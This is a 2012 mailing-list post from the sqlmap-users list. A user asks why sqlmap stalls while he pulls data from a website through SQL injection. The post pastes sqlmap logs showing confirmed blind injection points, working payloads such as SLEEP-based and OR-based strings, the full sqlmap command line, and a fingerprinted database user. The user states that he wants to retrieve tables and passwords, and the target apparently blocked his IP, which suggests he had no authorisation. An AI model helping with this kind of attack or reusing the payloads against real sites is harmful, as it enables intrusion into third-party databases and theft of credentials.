[sqlmap-users] 回复: sqlmap y/N can 't workable
Brought to you by:
inquisb
From: B. <sto...@qq...> - 2012-11-15 05:52:17
|
<div>HI Iago,</div><div><br></div><div> The sqlmap error .details as followed :</div><div><br></div><div><div>[13:32:02] [INFO] testing connection to the target url</div><div>[13:32:06] [INFO] testing if the url is stable, wait a few seconds</div><div>[13:32:11] [INFO] url is stable</div><div>[13:32:11] [INFO] testing if POST parameter 'hidJumpId' is dynamic</div><div>[13:32:12] [INFO] confirming that POST parameter 'hidJumpId' is dynamic</div><div>[13:32:13] [INFO] POST parameter 'hidJumpId' is dynamic</div><div>[13:32:14] [WARNING] reflective value(s) found and filtering out</div><div>[13:32:14] [WARNING] heuristic test shows that POST parameter 'hidJumpId' might not be injectable</div><div>[13:32:14] [INFO] testing for SQL injection on POST parameter 'hidJumpId'</div><div>[13:32:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'</div><div>[13:32:49] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request</div><div>[13:33:04] [INFO] POST parameter 'hidJumpId' is 'AND boolean-based blind - WHERE or HAVING clause' injectable </div><div>[13:33:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'</div><div>[13:33:34] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request</div><div>[13:33:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'</div><div>[13:33:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'</div><div>[13:33:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'</div><div>[13:33:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'</div><div>[13:33:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'</div><div>[13:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'</div><div>[13:33:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'</div><div>[13:33:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'</div><div>[13:33:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'</div><div>[13:33:41] [INFO] testing 'Oracle AND time-based blind'</div><div>[13:33:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'</div><div>[13:33:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found</div><div>[13:33:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'</div><div>[13:33:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'</div><div>[13:34:08] [INFO] checking if the injection point on POST parameter 'hidJumpId' is a false positive</div><div>[13:34:12] [INFO] heuristics detected web page charset 'ascii'</div><div>POST parameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N</div><div>N: command not found</div><div><br></div><div>[4]+ Stopped ./sqlmap.py -u "http://XXXp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=</div><div><br></div><div>[4]+ Stopped ./sqlmap.py -u "http://XXX" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=</div></div><div><br></div><div><div style="color:#909090;font-family:Arial Narrow;font-size:12px"><br></div><div style="font-size:14px;font-family:Verdana;color:#000;"><font size="+0"> <div> </div></font></div></div><div> </div><div><includetail><div><br></div><div><br></div><div style="font-size: 12px;font-family: Arial Narrow;padding:2px 0 2px 0;">------------------ 原始邮件 ------------------</div><div style="font-size: 12px;background:#efefef;padding:8px;"><div><b>发件人:</b> "Iago Sousa"<146...@gm...>;</div><div><b>发送时间:</b> 2012年6月24日(星期天) 中午12:33</div><div><b>收件人:</b> "Bob"<sto...@qq...>; <wbr></div><div><b>抄送:</b> "sqlmap-users"<sql...@li...>; <wbr></div><div><b>主题:</b> Re: [sqlmap-users] sqlmap always tell Connection timed out to thetarget url</div></div><div><br></div><p>I think that the site is blocking your ip address.</p> <p></p><blockquote type="cite">On Jun 23, 2012 11:09 PM, "Bob" <<a href="mailto:sto...@qq...">sto...@qq...</a>> wrote:<br><br><div><br>Hi all,<br><br> I am use sqlmap to retrieve database <br><br> current-user and current-db can workable <br><br>retrieve tables ,passwords etc will response time out <br><br>Could you tell me what is the problem ? how i can retrieve tables and passwords ?<br><br>Thanks <br><br>bob<br> [09:56:07] [INFO] testing connection to the target url<br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: c_sn<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm<br><br> Type: AND/OR time-based blind<br> Title: MySQL > 5.0.11 AND time-based blind<br> Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl<br> ---<br><br>[09:56:08] [INFO] testing MySQL<br>[09:56:08] [INFO] confirming MySQL<br>[09:56:08] [INFO] the back-end DBMS is MySQL<br>web server operating system: Linux CentOS 5<br>web application technology: Apache 2.2.3, PHP 5.1.6<br> back-end DBMS: MySQL >= 5.0.0<br>[09:56:08] [INFO] fetching current user<br>[09:56:08] [INFO] resumed: keyway_db@localhost<br>current user: 'keyway_db@localhost'<br><br>[09:56:08] [INFO] fetching database users privileges<br> [09:56:08] [INFO] fetching database users<br>[09:56:08] [INFO] fetching number of database users<br>[09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br> [09:56:08] [INFO] retrieved: <br>[09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>[09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br> [09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>[10:00:12] [CRITICAL] connection timed out to the target url or proxy<br><br>[*] shutting down at 10:00:12<br> <br><br></div><br>------------------------------------------------------------------------------<br> Live Security Virtual Conference<br> Exclusive live event will cover all the ways today's security and<br> threat landscape has changed and how IT managers can respond. Discussions<br> will include endpoint security, mobile security and the latest in malware<br> threats. <a href="http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/" target="_blank">http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/</a><br>_______________________________________________<br> sqlmap-users mailing list<br> <a href="mailto:sql...@li...">sql...@li...</a><br> <a href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users" target="_blank">https://lists.sourceforge.net/lists/listinfo/sqlmap-users</a><br> <br></blockquote><p></p></includetail></div> |